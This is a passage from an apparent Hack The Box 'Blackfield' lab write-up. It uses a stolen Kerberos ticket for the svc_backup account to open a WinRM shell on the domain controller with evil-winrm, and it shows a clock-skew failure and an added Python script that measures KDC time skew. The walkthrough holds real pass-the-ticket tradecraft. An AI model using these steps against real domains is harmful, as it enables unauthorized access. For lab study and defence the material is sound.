WinRM


The svc_backup account is able to WinRM to the target system due to its membership in the Remote Management Users group. This was also enumerated earlier during the ldapdomaindump session.

Now that I have secured the TGT of the svc_backup account, I can gain a foothold on the target system via WinRM.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ echo -e '[realms]\n\n\tBLACKFIELD.LOCAL = {\n\t\tkdc = dc01.blackfield.local\n\t}' | sudo tee /etc/krb5.conf
[realms]
 
	BLACKFIELD.LOCAL = {
		kdc = dc01.blackfield.local
	}

Setting up a minimal /etc/krb5.conf file so that evil-winrm can locate the KDC for the BLACKFIELD.LOCAL realm.

┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ KRB5CCNAME=svc_backup@dc01.blackfield.local.ccache evil-winrm -i dc01.blackfield.local -r BLACKFIELD.LOCAL       
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*evil-winrm* ps c:\Users\svc_backup\Documents> hostname
DC01
*evil-winrm* ps c:\Users\svc_backup\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . :
   ipv6 address. . . . . . . . . . . : dead:beef::283b:32d2:12e8:c7b9
   link-local ipv6 address . . . . . : fe80::283b:32d2:12e8:c7b9%17
   ipv4 address. . . . . . . . . . . : 10.10.10.192
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2

Initial foothold established on the target system as the svc_backup account via WinRM.

KRB_AP_ERR_SKEW(Clock skew too great)


*Evil-WinRM* PS C:\Users\svc_backup\Documents> systeminfo ; Get-ComputerInfo
 
Error: An error of type TypeError happened, message is no implicit conversion of nil into String
Error: Exiting with code 1
malloc(): unaligned fastbin chunk detected
zsh: IOT instruction  KRB5CCNAME=svc_backup@dc01.blackfield.local.ccache evil-winrm -i  -r 

I keep getting disconnected due to the KRB_AP_ERR_SKEW error. This makes the pass-the-ticket technique challenging.
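Kerberos rejects an authenticator whose timestamp differs from the KDC clock by more than the realm's tolerance (300 seconds by default, the clockskew setting in the [libdefaults] section of krb5.conf), which is exactly the KRB_AP_ERR_SKEW condition above. The following is an added example (not part of the original write-up or of evil-winrm) that measures the offset between the local clock and the DC's clock with a raw SNTP query on UDP 123 and reports whether it exceeds that tolerance; the host name and the sample response are assumptions.

```python
"""Measure clock skew against a KDC and compare it to the Kerberos tolerance."""
import socket
import struct
import time

NTP_EPOCH_OFFSET = 2208988800  # seconds between 1900-01-01 and the Unix epoch
KERBEROS_MAX_SKEW = 300        # MIT krb5 default: clockskew = 300 in [libdefaults]


def build_sntp_request() -> bytes:
    # First byte: LI=0, VN=3, Mode=3 (client); the remaining 47 bytes are zero.
    return b"\x1b" + b"\x00" * 47


def parse_sntp_transmit_time(packet: bytes) -> float:
    """Return the server's Transmit Timestamp (bytes 40..47) as Unix time."""
    if len(packet) < 48:
        raise ValueError("short SNTP packet")
    secs, frac = struct.unpack("!II", packet[40:48])
    return secs - NTP_EPOCH_OFFSET + frac / 2**32


def make_sample_response(unix_time: int) -> bytes:
    """Constructed sample SNTP reply (not a captured packet) for offline use."""
    header = b"\x1c"                        # LI=0, VN=3, Mode=4 (server)
    body = b"\x00" * 39                     # stratum .. receive timestamp
    transmit = struct.pack("!II", unix_time + NTP_EPOCH_OFFSET, 0)
    return header + body + transmit


def skew_seconds(server_time: float, local_time: float) -> float:
    """Positive when the server clock is ahead of the local clock."""
    return server_time - local_time


def exceeds_kerberos_tolerance(skew: float, tolerance: int = KERBEROS_MAX_SKEW) -> bool:
    return abs(skew) > tolerance


def query_kdc_time(host: str, port: int = 123, timeout: float = 3.0) -> float:
    """Ask the KDC (assumed to run W32Time, as domain controllers do) for its time."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_sntp_request(), (host, port))
        data, _ = s.recvfrom(48)
    return parse_sntp_transmit_time(data)


def check_kdc_skew(host: str = "dc01.blackfield.local") -> dict:
    """Network check: returns the measured skew and whether Kerberos would reject it."""
    skew = skew_seconds(query_kdc_time(host), time.time())
    return {"skew_seconds": skew, "too_large": exceeds_kerberos_tolerance(skew)}
```

If check_kdc_skew reports too_large, the local clock must be adjusted before the ticket is usable; on a domain the same check against a member host shows whether its time source is still the PDC emulator.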

Cleanup


┌──(kali㉿kali)-[~/archive/htb/labs/blackfield]
└─$ sudo rm /etc/krb5.conf

Removing the /etc/krb5.conf file after use.